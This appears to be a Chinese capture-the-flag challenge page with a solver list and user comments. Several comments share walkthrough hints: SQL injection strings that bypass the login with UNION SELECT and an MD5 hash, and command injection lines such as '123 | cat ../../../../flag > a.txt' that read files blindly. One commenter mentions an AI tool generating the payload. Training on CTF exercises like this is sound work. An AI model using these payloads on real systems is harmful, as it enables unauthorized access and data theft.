评分(9)
解题动态
十里故清云 攻破了该题 19小时前
Wu. 攻破了该题 1天前
jhon 攻破了该题 4天前
Jazz888 攻破了该题 4天前
TTxyz 攻破了该题 5天前
peaceminus1 攻破了该题 6天前
Jasmine_Iris 攻破了该题 6天前
Mori. 攻破了该题 6天前
2523822945 攻破了该题 6天前
czl2025 攻破了该题 6天前
潭影空人心 攻破了该题 6天前
qq1002517 攻破了该题 7天前
klfx1913 攻破了该题 8天前
Arno_Zoffy 攻破了该题 9天前
Newdap 攻破了该题 9天前
gaoyuxin 攻破了该题 10天前
hdcc1 攻破了该题 10天前
N1 攻破了该题 10天前
yxrqq817423 攻破了该题 11天前
评论
zhuizhui 7月前
举报
' UNION SELECT 'admin' , '99754106633f94d350db34d548d6091a' FROM DUAL;#-- 123;cat /flag > test
nihaozy 9月前
举报
学会了一个英语单词tip提示
zpxlz 4月前
举报
那很会学习了
DoubleUUU 10月前
举报
一顿sqlmap半小时,deepseek秒给payload:username = ' UNION SELECT "admin","202cb962ac59075b964b07152d234b70" -- &password = 123
liuguowang75 10月前
举报
登陆后,在检验窗口中输入:123 | ls / > a.txt ,可以看到用户目录中所有文件,
sunset2004 1年前
举报
username=admin' union select 1,md5(123)#&password=123,union生成临时表将md5后的123到表里,然后密码输入123即可绕过。RCE直接通过重定向符号即可,将无回显的结果保存到a.txt里即可,123 | cat ../../../../flag > a.txt
Zhou_re-pwn 1年前
举报
没太看懂这题出的啥意思,进入监控系统后,和wp的绕过一模一样,结果回显没有显示
Yoruko39 1年前
举报
sql注入+RCE,但主要是代码审计,进入命令界面后,发现可以用;截断执行命令,但无回显。 可以用重定向符,将执行结果输出到文件中,再访问/a.txt即可,例如可以;cat * > a.txt,此时可以看到当前目录下所有文件,审计发现flag在一个宏变量$FLAG里,echo到文件即可
toonavy 1年前
举报
进程监控系统 输入需要检测的服务 ,退币!!!
Zhumeng 1年前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag
Zhumeng 1年前
举报
这里运用登录框返回包会看到tip 然后将tip base64解码得到 部分源码,这里字段为2 通过联合查询会产生一个临时表,md5(123) password=123成功绕过 然后回来到命令执行无回血 通过1; echo `cat /flag`>>1.txt 访问1.txt得到flag